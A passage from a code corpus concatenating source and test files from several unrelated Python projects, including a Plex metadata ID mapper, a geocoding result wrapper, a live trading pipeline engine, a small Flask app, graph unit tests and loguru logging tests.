#### File: plex-movie-agent-mapper/plexmovieagentmapper/mapper.py
```python
import os
import re
import logging
from pathlib import Path
import sqlite3
from plexmovieagentmapper import dbcopy
from plexmovieagentmapper import media
class PlexMovieAgentMapper:
def __init__(self, plex_db=None, copy_db=True, debug=False):
"""
:param plex_db:
:param copy_db:
"""
if not plex_db:
raise ValueError("Database path is a required field")
elif not os.path.isfile(plex_db):
raise FileNotFoundError()
self._debug = debug
if self._debug:
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.INFO)
self._plex_db = plex_db
self._copy_db = copy_db
self._current_hash = {}
self._imdb_hash, self._tmdb_hash, self._tvdb_hash, self._plex_hash, self._details_hash = self._generate_matching_hash()
def get_imdb_from_plex_guid(self, plex_guid=None):
"""Returns an IMDB id for a given Plex GUID if a match is found.
:param plex_guid:
:return:
"""
if self._plex_hash.get(plex_guid, None):
return self._plex_hash[plex_guid]['imdb']
return None
def get_tmdb_from_plex_guid(self, plex_guid=None):
"""Returns a TMDB id for a given Plex GUID if a match is found.
:param plex_guid:
:return:
"""
if self._plex_hash.get(plex_guid, None):
return self._plex_hash[plex_guid]['tmdb']
return None
def get_tvdb_from_plex_guid(self, plex_guid=None):
"""Returns a TVDB id for a given Plex GUID if a match is found.
:param plex_guid:
:return:
"""
if self._plex_hash.get(plex_guid, None):
return self._plex_hash[plex_guid]['tvdb']
return None
def get_plex_guid_from_imdb(self, imdb_id=None):
"""Returns a Plex GUID for a given IMDB id if a match is found.
:param imdb_id:
:return:
"""
if self._imdb_hash.get(imdb_id, None):
return self._imdb_hash[imdb_id]
return None
def get_plex_guid_from_tmdb(self, tmdb_id=None):
"""Returns a Plex GUID for a given TMDB id if a match is found.
:param tmdb_id:
:return:
"""
if self._tmdb_hash.get(tmdb_id, None):
return self._tmdb_hash[tmdb_id]
return None
def get_plex_guid_from_tvdb(self, tvdb_id=None):
"""Returns a Plex GUID for a given TVDB id if a match is found.
:param tvdb_id:
:rtype: bool
:return:
"""
if self._tvdb_hash.get(tvdb_id, None):
return self._tvdb_hash[tvdb_id]
return None
def plex_guid_available(self, plex_guid=None):
"""Check if a Plex GUID is in the hash
:param plex_guid:
:return:
"""
return True if plex_guid and self._plex_hash.get(plex_guid, None) else False
def get_details_from_imdb(self, library_id=None, imdb_id=None):
"""Get media item details for a given IMDB id.
:param library_id:
:param imdb_id:
:return:
"""
if imdb_id and self._imdb_hash.get(imdb_id, None):
details = self._details_hash.get(self._imdb_hash[imdb_id])
return details if not library_id or library_id in details.available_libraries else None
return None
def get_details_from_tmdb(self, library_id=None, tmdb_id=None):
"""Get media item details for a given TMDB id.
:param library_id:
:param tmdb_id:
:return:
"""
if tmdb_id and self._tmdb_hash.get(tmdb_id, None):
details = self._details_hash.get(self._tmdb_hash[tmdb_id])
return details if not library_id or library_id in details.available_libraries else None
return None
def get_details_from_tvdb(self, library_id=None, tvdb_id=None):
"""Get media item details for a given TVDB id.
:param library_id:
:param tvdb_id:
:return:
"""
if tvdb_id and self._tvdb_hash.get(tvdb_id, None):
details = self._details_hash.get(self._tvdb_hash[tvdb_id])
return details if not library_id or library_id in details.available_libraries else None
return None
def get_details_from_plex_guid(self, library_id=None, plex_guid=None):
"""Get media item details for a given Plex GUID.
:param library_id:
:param plex_guid:
:return:
"""
if plex_guid:
details = self._details_hash.get(plex_guid, None)
if details and library_id:
details.filter_files(library_id)
return details
return None
def _generate_matching_hash(self):
"""Generate a series of lookup hashes
:return:
"""
imdb_hash = {}
tmdb_hash = {}
tvdb_hash = {}
plex_agent_hash = {}
details_hash = {}
if self._plex_db and os.path.isfile(self._plex_db):
# Does the user want to copy the database?
if self._copy_db:
db_path = dbcopy.DbCopy(self._plex_db)
else:
db_path = Path(self._plex_db)
with db_path as _db_path:
if os.path.isfile(_db_path):
# Open a connection to the database
conn = sqlite3.connect(_db_path, timeout=10)
# Read each result as a row
conn.row_factory = sqlite3.Row
c = conn.cursor()
# Build a hash for Movies
movie_query = 'SELECT mdi.id as metadata_item_id, t.tag, mdi.guid, mdi.title, mdi.year, mi.library_section_id, GROUP_CONCAT(mp.file, \';\') as file_parts, ls.uuid ' \
'FROM metadata_items mdi ' \
'JOIN taggings tg ON tg.metadata_item_id = mdi.id ' \
'JOIN tags t ON t.id = tg.tag_id AND t.tag_type = 314 ' \
'JOIN media_items mi ON mi.metadata_item_id = mdi.id ' \
'JOIN media_parts mp ON mp.media_item_id = mi.id ' \
'JOIN library_sections ls ON ls.id = mdi.library_section_id ' \
'WHERE mdi.metadata_type = 1 ' \
'GROUP BY mdi.guid, t.tag, mi.library_section_id'
for row in c.execute(movie_query):
row_id = None
row_type = None
if not row['guid'].startswith('com.plexapp.agents'):
if row['tag'] and 'imdb' in row['tag']:
row_id = row['tag'].split('imdb://')[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['tag'] and 'tmdb' in row['tag']:
row_id = row['tag'].split('tmdb://')[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['tag'] and 'tvdb' in row['tag']:
row_id = row['tag'].split('tvdb://')[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if row['guid'] and 'imdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for IMDB".format(row['guid']))
row_id = re.split(r'^((?:tt)?\d+)', row['guid'].split('imdb://')[1])[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['guid'] and 'themoviedb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TMDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('themoviedb://')[1])[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['guid'] and 'thetvdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TVDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('thetvdb://')[1])[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if self._debug:
logging.info(u"Agent not matched for Movie ({})".format(row['guid']))
if not plex_agent_hash.get(row['guid'], None) and row_id is not None and row_type is not None:
if self._debug:
logging.info(u"Finding media files for {} ({})".format(row['title'], row['year']))
plex_agent_hash[row['guid']] = {'imdb': None, 'tmdb': None, 'tvdb': None}
media_item = media.Media(row['guid'], row['title'], row['year'], 'video', row['metadata_item_id'], row['uuid'])
details_hash[row['guid']] = media_item
if plex_agent_hash.get(row['guid'], None):
details_hash[row['guid']].add_files(row['library_section_id'], row['file_parts'].split(';'))
plex_agent_hash[row['guid']][row_type] = row_id
# Add TV Series to the hash
tv_query = 'SELECT mdi.id as metadata_item_id, t.tag, mdi.guid, mdi.title, mdi.year, mdi.library_section_id, ls.uuid ' \
'FROM metadata_items mdi ' \
'JOIN library_sections ls ON ls.id = mdi.library_section_id ' \
'LEFT JOIN taggings tg ON tg.metadata_item_id = mdi.id ' \
'LEFT JOIN tags t ON t.id = tg.tag_id AND t.tag_type = 314 ' \
'WHERE mdi.metadata_type = 2 ' \
'GROUP BY mdi.guid, t.tag, mdi.library_section_id'
c.execute(tv_query)
tv_series_results = c.fetchall()
for row in tv_series_results:
row_id = None
row_type = None
if not row['guid'].startswith('com.plexapp.agents'):
if row['tag'] and 'imdb' in row['tag']:
row_id = row['tag'].split('imdb://')[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['tag'] and 'tmdb' in row['tag']:
row_id = row['tag'].split('tmdb://')[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['tag'] and 'tvdb' in row['tag']:
row_id = row['tag'].split('tvdb://')[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if row['guid'] and 'imdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for IMDB".format(row['guid']))
row_id = re.split(r'^((?:tt)?\d+)', row['guid'].split('imdb://')[1])[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['guid'] and 'themoviedb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TMDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('themoviedb://')[1])[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['guid'] and 'thetvdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TVDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('thetvdb://')[1])[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if self._debug:
logging.info(u"Agent not matched TV series ({})".format(row['guid']))
if not plex_agent_hash.get(row['guid'], None) and row_id is not None and row_type is not None:
if self._debug:
logging.info(u"Finding media files for {} ({})".format(row['title'], row['year']))
plex_agent_hash[row['guid']] = {'imdb': None, 'tmdb': None, 'tvdb': None}
media_item = media.Media(row['guid'], row['title'], row['year'], 'video', row['metadata_item_id'], row['uuid'])
details_hash[row['guid']] = media_item
ep_cur = conn.cursor()
# We need to build an episode list
episode_query = 'SELECT GROUP_CONCAT(mp.file, \';\') as file_parts ' \
'FROM metadata_items mdi_s ' \
'JOIN metadata_items mdi_e ON mdi_e.parent_id = mdi_s.id ' \
'JOIN media_items mi ON mi.metadata_item_id = mdi_e.id ' \
'JOIN media_parts mp ON mp.media_item_id = mi.id ' \
'WHERE mdi_s.parent_id = ' + str(row['metadata_item_id'])
episodes = ep_cur.execute(episode_query)
ep_list = episodes.fetchone()['file_parts'].split(';')
details_hash[row['guid']].add_files(row['library_section_id'], ep_list)
if plex_agent_hash.get(row['guid'], None):
plex_agent_hash[row['guid']][row_type] = row_id
conn.close()
return imdb_hash, tmdb_hash, tvdb_hash, plex_agent_hash, details_hash
```
#### File: plex-movie-agent-mapper/plexmovieagentmapper/part.py
```python
class Part(object):
def __init__(self, file=None, library_id=None):
self.file = file
self.library_id = library_id
``` |
{
"source": "joshgeller/pygeocodio",
"score": 3
} |
#### File: pygeocodio/geocodio/data.py
```python
class Address(dict):
"""
Dictionary class that provides some convenience wrappers for accessing
commonly used data elements on an Address.
"""
def __init__(self, address_dict, order="lat"):
super(Address, self).__init__(address_dict)
self.order = order
@property
def coords(self):
"""
Returns a tuple representing the location of the address in a
GIS coords format, i.e. (longitude, latitude).
"""
x, y = ("lat", "lng") if self.order == "lat" else ("lng", "lat")
try:
return (self["location"][x], self["location"][y])
except KeyError:
return None
@property
def accuracy(self):
"""
Returns the accuracy integer or None of the geocoded address.
"""
try:
return self["accuracy"]
except KeyError:
return None
@property
def formatted_address(self):
"""
Returns a list of formatted addresses from the Location list
"""
return self.get("formatted_address", "")
class Location(dict):
"""
Dictionary class that provides some convenience accessors to commonly used
data elements.
"""
def __init__(self, result_dict, order="lat"):
super(Location, self).__init__(result_dict)
try:
self.best_match = Address(self["results"][0], order=order)
# A KeyError would be raised if an address could not be parsed or
# geocoded, i.e. from a batch address geocoding process. An index error
# would be raised under similar circumstances, e.g. the 'results' key
# just refers to an empty list.
except (KeyError, IndexError):
self.best_match = Address({})
self.order = order
@property
def coords(self):
"""
Returns a tuple representing the location of the first result in a
GIS coords format, i.e. (longitude, latitude).
"""
return self.best_match.coords
@property
def accuracy(self):
"""
Returns the accuracy integer or None of the geocoded address.
"""
return self.best_match.accuracy
@property
def formatted_address(self):
"""
Returns a list of formatted addresses from the Location list
"""
return self.best_match.formatted_address
class LocationCollection(list):
"""
A list of Location objects, with dictionary lookup by address.
"""
lookups = {}
def __init__(self, results_list, order="lat"):
"""
Loads the individual responses into an internal list and uses the query
values as lookup keys.
"""
results = []
for index, result in enumerate(results_list):
results.append(Location(result["response"], order=order))
self.lookups[result["query"]] = index
super(LocationCollection, self).__init__(results)
self.order = order
def get(self, key):
"""
Returns an individual Location by query lookup, e.g. address or point.
"""
if isinstance(key, tuple):
# TODO handle different ordering
try:
x, y = float(key[0]), float(key[1])
except IndexError:
raise ValueError("Two values are required for a coordinate pair")
except ValueError:
raise ValueError("Only float or float-coercable values can be passed")
key = "{0},{1}".format(x, y)
return self[self.lookups[key]]
@property
def coords(self):
"""
Returns a list of tuples for the best matched coordinates.
"""
return [l.coords for l in self]
@property
def formatted_addresses(self):
"""
Returns a list of formatted addresses from the Location list
"""
return [l.formatted_address for l in self]
``` |
{
"source": "JoshGenao/pipeline-live",
"score": 2
} |
#### File: data/iex/fundamentals_loader.py
```python
import logging
import numpy as np
from pipeline_live.data.sources import iex
from zipline.pipeline.loaders.base import PipelineLoader
from zipline.utils.numpy_utils import object_dtype
log = logging.getLogger(__name__)
class IEXEventLoader(PipelineLoader):
def _safe_flat_getter(self, symbol, symbols, column):
data = symbols.get(symbol, None)
out = column.missing_value
if data:
out = data[0].get(column.name, column.missing_value)
return out
def load_adjusted_array(self, columns, dates, symbols, mask):
symbol_dict = self._load()
out = {}
for c in columns:
data = np.array([
self._safe_flat_getter(symbol, symbol_dict, c)
for symbol in symbols
], dtype=c.dtype)
if c.dtype == object_dtype:
data[data == None] = c.missing_value # noqa
out[c] = np.tile(data, (len(dates), 1))
return out
class IEXBaseLoader(PipelineLoader):
def load_adjusted_array(self, columns, dates, symbols, mask):
symbol_dict = self._load()
out = {}
for c in columns:
data = np.array([
symbol_dict.get(symbol, {}).get(c.name, c.missing_value)
for symbol in symbols
], dtype=c.dtype)
if c.dtype == object_dtype:
data[data == None] = c.missing_value # noqa
out[c] = np.tile(data, (len(dates), 1))
return out
class IEXKeyStatsLoader(IEXBaseLoader):
def _load(self):
log.info('Loading Key Stats')
return iex.key_stats()
class IEXCompanyLoader(IEXBaseLoader):
def _load(self):
log.info('Loading Company Stats')
return iex.company()
class IEXFinancialsLoader(IEXEventLoader):
def _load(self):
log.info('Loading Financials')
return iex.financials()
class IEXEarningsLoader(IEXEventLoader):
def _load(self):
log.info('Loading Earnings')
return iex.earnings()
```
#### File: data/polygon/fundamentals_loader.py
```python
import numpy as np
from zipline.pipeline.loaders.base import PipelineLoader
from pipeline_live.data.sources import polygon
class PolygonCompanyLoader(PipelineLoader):
def load_adjusted_array(self, columns, dates, symbols, mask):
company = polygon.company()
out = {}
for c in columns:
data = [
company.get(symbol, {}).get(c.name, c.missing_value)
for symbol in symbols
]
out[c] = np.tile(np.array(data, dtype=c.dtype), (len(dates), 1))
return out
```
#### File: pipeline-live/pipeline_live/engine.py
```python
from uuid import uuid4
from numpy import array
import pandas as pd
from pandas import DataFrame
from six import (
iteritems,
)
from toolz import groupby, juxt
from toolz.curried.operator import getitem
from zipline.lib.adjusted_array import ensure_adjusted_array, ensure_ndarray
from zipline.errors import NoFurtherDataError
from zipline.pipeline.engine import default_populate_initial_workspace
from zipline.pipeline.term import AssetExists, InputDates, LoadableTerm
from zipline.utils.calendars import get_calendar
from zipline.utils.numpy_utils import (
as_column,
repeat_first_axis,
)
from zipline.utils.pandas_utils import explode
class LivePipelineEngine(object):
def __init__(self,
list_symbols,
calendar=None,
populate_initial_workspace=None):
self._list_symbols = list_symbols
if calendar is None:
calendar = get_calendar('NYSE').all_sessions
self._calendar = calendar
self._root_mask_term = AssetExists()
self._root_mask_dates_term = InputDates()
self._populate_initial_workspace = (
populate_initial_workspace or default_populate_initial_workspace
)
def run_pipeline(self, pipeline):
now = pd.Timestamp.now(tz=self._calendar.tz)
today = pd.Timestamp(
year=now.year, month=now.month, day=now.day,
tz='utc')
end_date = self._calendar[self._calendar.get_loc(
today, method='ffill'
)]
start_date = end_date
screen_name = uuid4().hex
graph = pipeline.to_execution_plan(screen_name,
self._root_mask_term,
self._calendar,
start_date,
end_date,
)
extra_rows = graph.extra_rows[self._root_mask_term]
root_mask = self._compute_root_mask(start_date, end_date, extra_rows)
dates, assets, root_mask_values = explode(root_mask)
initial_workspace = self._populate_initial_workspace(
{
self._root_mask_term: root_mask_values,
self._root_mask_dates_term: as_column(dates.values)
},
self._root_mask_term,
graph,
dates,
assets,
)
results = self.compute_chunk(
graph,
dates,
assets,
initial_workspace,
)
return self._to_narrow(
graph.outputs,
results,
results.pop(screen_name),
dates[extra_rows:],
assets,
)
def _compute_root_mask(self, start_date, end_date, extra_rows):
"""
Compute a lifetimes matrix from our AssetFinder, then drop columns that
didn't exist at all during the query dates.
Parameters
----------
start_date : pd.Timestamp
Base start date for the matrix.
end_date : pd.Timestamp
End date for the matrix.
extra_rows : int
Number of extra rows to compute before `start_date`.
Extra rows are needed by terms like moving averages that require a
trailing window of data.
Returns
-------
lifetimes : pd.DataFrame
Frame of dtype `bool` containing dates from `extra_rows` days
before `start_date`, continuing through to `end_date`. The
returned frame contains as columns all assets in our AssetFinder
that existed for at least one day between `start_date` and
`end_date`.
"""
calendar = self._calendar
start_idx, end_idx = calendar.slice_locs(start_date, end_date)
if start_idx < extra_rows:
raise NoFurtherDataError.from_lookback_window(
initial_message="Insufficient data to compute Pipeline:",
first_date=calendar[0],
lookback_start=start_date,
lookback_length=extra_rows,
)
# Build lifetimes matrix reaching back to `extra_rows` days before
# `start_date.`
symbols = self._list_symbols()
dates = calendar[start_idx - extra_rows:end_idx]
symbols = sorted(symbols)
lifetimes = pd.DataFrame(True, index=dates, columns=symbols)
assert lifetimes.index[extra_rows] == start_date
assert lifetimes.index[-1] == end_date
if not lifetimes.columns.unique:
columns = lifetimes.columns
duplicated = columns[columns.duplicated()].unique()
raise AssertionError("Duplicated sids: %d" % duplicated)
# Filter out columns that didn't exist between the requested start and
# end dates.
existed = lifetimes.iloc[extra_rows:].any()
ret = lifetimes.loc[:, existed]
shape = ret.shape
assert shape[0] * shape[1] != 0, 'root mask cannot be empty'
return ret
@staticmethod
def _inputs_for_term(term, workspace, graph):
"""
Compute inputs for the given term.
This is mostly complicated by the fact that for each input we store as
many rows as will be necessary to serve **any** computation requiring
that input.
"""
offsets = graph.offset
out = []
if term.windowed:
# If term is windowed, then all input data should be instances of
# AdjustedArray.
for input_ in term.inputs:
adjusted_array = ensure_adjusted_array(
workspace[input_], input_.missing_value,
)
out.append(
adjusted_array.traverse(
window_length=term.window_length,
offset=offsets[term, input_],
)
)
else:
# If term is not windowed, input_data may be an AdjustedArray or
# np.ndarray. Coerce the former to the latter.
for input_ in term.inputs:
input_data = ensure_ndarray(workspace[input_])
offset = offsets[term, input_]
# OPTIMIZATION: Don't make a copy by doing input_data[0:] if
# offset is zero.
if offset:
input_data = input_data[offset:]
out.append(input_data)
return out
def compute_chunk(self, graph, dates, symbols, initial_workspace):
"""
Compute the Pipeline terms in the graph for the requested start and end
dates.
Parameters
----------
graph : zipline.pipeline.graph.TermGraph
dates : pd.DatetimeIndex
Row labels for our root mask.
symbols : list
Column labels for our root mask.
initial_workspace : dict
Map from term -> output.
Must contain at least entry for `self._root_mask_term` whose shape
is `(len(dates), len(symbols))`, but may contain additional
pre-computed terms for testing or optimization purposes.
Returns
-------
results : dict
Dictionary mapping requested results to outputs.
"""
self._validate_compute_chunk_params(dates, symbols, initial_workspace)
# get_loader = self.get_loader
# Copy the supplied initial workspace so we don't mutate it in place.
workspace = initial_workspace.copy()
# If loadable terms share the same loader and extra_rows, load them all
# together.
loader_group_key = juxt(
lambda x: x.dataset.get_loader(), getitem(
graph.extra_rows))
loader_groups = groupby(loader_group_key, graph.loadable_terms)
refcounts = graph.initial_refcounts(workspace)
for term in graph.execution_order(refcounts):
# `term` may have been supplied in `initial_workspace`, and in the
# future we may pre-compute loadable terms coming from the same
# dataset. In either case, we will already have an entry for this
# term, which we shouldn't re-compute.
if term in workspace:
continue
# Asset labels are always the same, but date labels vary by how
# many extra rows are needed.
mask, mask_dates = graph.mask_and_dates_for_term(
term,
self._root_mask_term,
workspace,
dates,
)
if isinstance(term, LoadableTerm):
to_load = sorted(
loader_groups[loader_group_key(term)],
key=lambda t: t.dataset
)
loader = term.dataset.get_loader()
loaded = loader.load_adjusted_array(
to_load, mask_dates, symbols, mask,
)
workspace.update(loaded)
else:
workspace[term] = term._compute(
self._inputs_for_term(term, workspace, graph),
mask_dates,
symbols,
mask,
)
if term.ndim == 2:
assert workspace[term].shape == mask.shape
else:
assert workspace[term].shape == (mask.shape[0], 1)
# Decref dependencies of ``term``, and clear any terms whose
# refcounts hit 0.
for garbage_term in graph.decref_dependencies(term, refcounts):
del workspace[garbage_term]
out = {}
graph_extra_rows = graph.extra_rows
for name, term in iteritems(graph.outputs):
# Truncate off extra rows from outputs.
out[name] = workspace[term][graph_extra_rows[term]:]
return out
def _to_narrow(self, terms, data, mask, dates, symbols):
"""
Convert raw computed pipeline results into a DataFrame for public APIs.
Parameters
----------
terms : dict[str -> Term]
Dict mapping column names to terms.
data : dict[str -> ndarray[ndim=2]]
Dict mapping column names to computed results for those names.
mask : ndarray[bool, ndim=2]
Mask array of values to keep.
dates : ndarray[datetime64, ndim=1]
Row index for arrays `data` and `mask`
symbols : list
Column index
Returns
-------
results : pd.DataFrame
The indices of `results` are as follows:
index : two-tiered MultiIndex of (date, asset).
Contains an entry for each (date, asset) pair corresponding to
a `True` value in `mask`.
columns : Index of str
One column per entry in `data`.
If mask[date, asset] is True, then result.loc[(date, asset), colname]
will contain the value of data[colname][date, asset].
"""
assert len(dates) == 1
if not mask.any():
# Manually handle the empty DataFrame case. This is a workaround
# to pandas failing to tz_localize an empty dataframe with a
# MultiIndex. It also saves us the work of applying a known-empty
# mask to each array.
#
# Slicing `dates` here to preserve pandas metadata.
# empty_dates = dates[:0]
empty_assets = array([], dtype=object)
return DataFrame(
data={
name: array([], dtype=arr.dtype)
for name, arr in iteritems(data)
},
index=pd.Index(empty_assets),
# index=MultiIndex.from_arrays([empty_dates, empty_assets]),
)
# resolved_assets = array(self._finder.retrieve_all(assets))
# dates_kept = repeat_last_axis(dates.values, len(symbols))[mask]
# assets_kept = repeat_first_axis(resolved_assets, len(dates))[mask]
assets_kept = repeat_first_axis(symbols, len(dates))[mask]
final_columns = {}
for name in data:
# Each term that computed an output has its postprocess method
# called on the filtered result.
#
# As of Mon May 2 15:38:47 2016, we only use this to convert
# LabelArrays into categoricals.
final_columns[name] = terms[name].postprocess(data[name][mask])
return DataFrame(
data=final_columns,
index=pd.Index(assets_kept),
# index=MultiIndex.from_arrays([dates_kept, assets_kept]),
)
def _validate_compute_chunk_params(
self, dates, symbols, initial_workspace):
"""
Verify that the values passed to compute_chunk are well-formed.
"""
root = self._root_mask_term
clsname = type(self).__name__
# Writing this out explicitly so this errors in testing if we change
# the name without updating this line.
compute_chunk_name = self.compute_chunk.__name__
if root not in initial_workspace:
raise AssertionError(
"root_mask values not supplied to {cls}.{method}".format(
cls=clsname,
method=compute_chunk_name,
)
)
shape = initial_workspace[root].shape
implied_shape = len(dates), len(symbols)
if shape != implied_shape:
raise AssertionError(
"root_mask shape is {shape}, but received dates/symbols "
"imply that shape should be {implied}".format(
shape=shape,
implied=implied_shape,
)
)
```
#### File: pipeline-live/tests/test_alpaca.py
```python
import pandas as pd
import numpy as np
from .datamock import mock_tradeapi
from pipeline_live.data.alpaca.pricing import USEquityPricing
def test_pricing_loader(refdata, alpaca_tradeapi, data_path):
mock_tradeapi.list_assets(alpaca_tradeapi)
mock_tradeapi.get_barset(alpaca_tradeapi)
loader = USEquityPricing.get_loader()
columns = [USEquityPricing.close]
dates = [pd.Timestamp('2018-08-22', tz='UTC')]
symbols = ['AA']
mask = np.zeros((1, 1), dtype='bool')
out = loader.load_adjusted_array(columns, dates, symbols, mask)
assert out[USEquityPricing.close]._data.shape == (1, 1)
``` |
{
"source": "joshglenen/Rating-Recalculator",
"score": 2
} |
#### File: joshglenen/Rating-Recalculator/runApp.py
```python
import sys
from flask import Flask, render_template, json, request
import HTML_IMDB
app = Flask(__name__)
@app.route('/')
def display():
return render_template('index.html')
@app.route('/<url>', methods=['POST'])
def execute(url):
return HTML_IMDB.findID(url,0) # TODO: implement dropdown menu with index
if __name__ == '__main__':
app.run()
``` |
{
"source": "JoshGoA/scinet",
"score": 3
} |
#### File: scinet/tests/test_graph.py
```python
import unittest
from scinet import Graph
class TestGraph(unittest.TestCase):
def setUp(self):
self.G = Graph()
def test_init(self):
self.assertFalse(self.G)
def test_add_vertex(self):
for vertex in range(5):
self.G.add_vertex(vertex)
self.assertIn(vertex, self.G)
def test_add_edge(self):
for source_vertex, target_vertex, edge in zip(range(5), range(5), range(5)):
self.G.add_edge(source_vertex, target_vertex, edge)
self.assertIn(edge, self.G[source_vertex][target_vertex])
def test_remove_vertex(self):
self.test_add_vertex()
for vertex in set(self.G.vertices()):
self.G.remove_vertex(vertex)
self.assertNotIn(vertex, self.G)
def test_remove_edge(self):
self.test_add_edge()
for source_vertex, target_vertex in set(self.G.edges()):
self.G.remove_edge(source_vertex, target_vertex)
self.assertNotIn(target_vertex, self.G[source_vertex])
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshgordon/loguru",
"score": 3
} |
#### File: loguru/loguru/_recattrs.py
```python
from collections import namedtuple
class LevelRecattr(str):
__slots__ = ("name", "no", "icon")
class FileRecattr(str):
__slots__ = ("name", "path")
class ThreadRecattr(str):
__slots__ = ("name", "id")
class ProcessRecattr(str):
__slots__ = ("name", "id")
class ExceptionRecattr(namedtuple("ExceptionRecattr", ("type", "value", "traceback"))):
def __reduce__(self):
exception = (self.type, self.value, None) # tracebacks are not pickable
return (ExceptionRecattr, exception)
```
#### File: source/backtrace/function.py
```python
import sys
from loguru import logger
logger.remove()
logger.add(sys.stderr, format="", colorize=False, backtrace=True, diagnose=False)
@logger.catch()
def a():
1 / 0
def b():
2 / 0
def c():
3 / 0
a()
with logger.catch():
b()
try:
c()
except ZeroDivisionError:
logger.exception("")
```
#### File: source/backtrace/missing_attributes_traceback_objects.py
```python
import sys
from loguru import logger
from collections import namedtuple
logger.remove()
logger.add(sys.stderr, format="", colorize=False, backtrace=True, diagnose=False)
a, b = 1, 0
def div(x, y):
x / y
def foo():
div(a, b)
# See Twisted: https://git.io/fjJ48
# See Billiard: https://git.io/fjJ44
fake_code = namedtuple("fake_code", ("co_filename", "co_name"))
fake_frame = namedtuple("fake_frame", ("f_back", "f_code", "f_globals", "f_lineno", "f_locals"))
fake_traceback = namedtuple("fake_traceback", ("tb_frame", "tb_lasti", "tb_lineno", "tb_next"))
def make_fake(tb):
if not tb:
return None
code = fake_code(tb.tb_frame.f_code.co_filename, tb.tb_frame.f_code.co_name)
frame = fake_frame(None, code, {}, tb.tb_lineno, {})
tb = fake_traceback(frame, tb.tb_lasti, tb.tb_lineno, make_fake(tb.tb_next))
return tb
try:
foo()
except ZeroDivisionError:
type_, value, tb = sys.exc_info()
tb = make_fake(tb)
logger.opt(exception=(type_, value, tb)).error("")
```
#### File: source/others/sys_tracebacklimit.py
```python
import sys
from loguru import logger
logger.remove()
logger.add(sys.stderr, format="", diagnose=False, backtrace=False, colorize=False)
logger.add(sys.stderr, format="", diagnose=True, backtrace=False, colorize=False)
logger.add(sys.stderr, format="", diagnose=False, backtrace=True, colorize=False)
logger.add(sys.stderr, format="", diagnose=True, backtrace=True, colorize=False)
def a():
b()
def b():
c()
def c():
d()
def d():
e()
def e():
f()
def f():
g()
def g():
h()
def h():
i()
def i():
j(1, 0)
def j(a, b):
a / b
sys.tracebacklimit = 5
try:
a()
except ZeroDivisionError:
logger.exception("")
```
#### File: loguru/tests/test_add_option_enqueue.py
```python
from loguru import logger
import time
def test_enqueue():
x = []
def sink(message):
time.sleep(0.1)
x.append(message)
logger.add(sink, format="{message}", enqueue=True)
logger.debug("Test")
assert len(x) == 0
time.sleep(0.2)
assert len(x) == 1
assert x[0] == "Test\n"
def test_enqueue_with_exception():
x = []
def sink(message):
time.sleep(0.1)
x.append(message)
logger.add(sink, format="{message}", enqueue=True)
try:
1 / 0
except ZeroDivisionError:
logger.exception("Error")
assert len(x) == 0
time.sleep(0.2)
assert len(x) == 1
lines = x[0].splitlines()
assert lines[0] == "Error"
assert lines[-1] == "ZeroDivisionError: division by zero"
```
#### File: loguru/tests/test_parse.py
```python
import pytest
import re
import pathlib
import io
from datetime import datetime
from loguru import logger
TEXT = "This\nIs\nRandom\nText\n123456789\nABC!DEF\nThis Is The End\n"
@pytest.fixture
def fileobj():
with io.StringIO(TEXT) as file:
yield file
def test_parse_file(tmpdir):
file = tmpdir.join("test.log")
file.write(TEXT)
result, *_ = list(logger.parse(str(file), r"(?P<num>\d+)"))
assert result == dict(num="123456789")
def test_parse_fileobj(tmpdir):
file = tmpdir.join("test.log")
file.write(TEXT)
result, *_ = list(logger.parse(open(str(file)), r"^(?P<t>\w+)"))
assert result == dict(t="This")
def test_parse_pathlib(tmpdir):
file = tmpdir.join("test.log")
file.write(TEXT)
result, *_ = list(logger.parse(pathlib.Path(str(file)), r"(?P<r>Random)"))
assert result == dict(r="Random")
def test_parse_string_pattern(fileobj):
result, *_ = list(logger.parse(fileobj, r"(?P<num>\d+)"))
assert result == dict(num="123456789")
def test_parse_regex_pattern(fileobj):
regex = re.compile(r"(?P<maj>[a-z]*![a-z]*)", flags=re.I)
result, *_ = list(logger.parse(fileobj, regex))
assert result == dict(maj="ABC!DEF")
def test_parse_multiline_pattern(fileobj):
result, *_ = list(logger.parse(fileobj, r"(?P<text>This[\s\S]*Text\n)"))
assert result == dict(text="This\nIs\nRandom\nText\n")
def test_parse_without_group(fileobj):
result, *_ = list(logger.parse(fileobj, r"\d+"))
assert result == {}
def test_parse_bytes():
with io.BytesIO(b"Testing bytes!") as fileobj:
result, *_ = list(logger.parse(fileobj, br"(?P<ponct>[?!:])"))
assert result == dict(ponct=b"!")
@pytest.mark.parametrize("chunk", [-1, 1, 2 ** 16])
def test_chunk(fileobj, chunk):
result, *_ = list(logger.parse(fileobj, r"(?P<a>[ABC]+)", chunk=chunk))
assert result == dict(a="ABC")
def test_positive_lookbehind_pattern():
text = "ab" * 100
pattern = r"(?<=a)(?P<b>b)"
with io.StringIO(text) as file:
result = list(logger.parse(file, pattern, chunk=9))
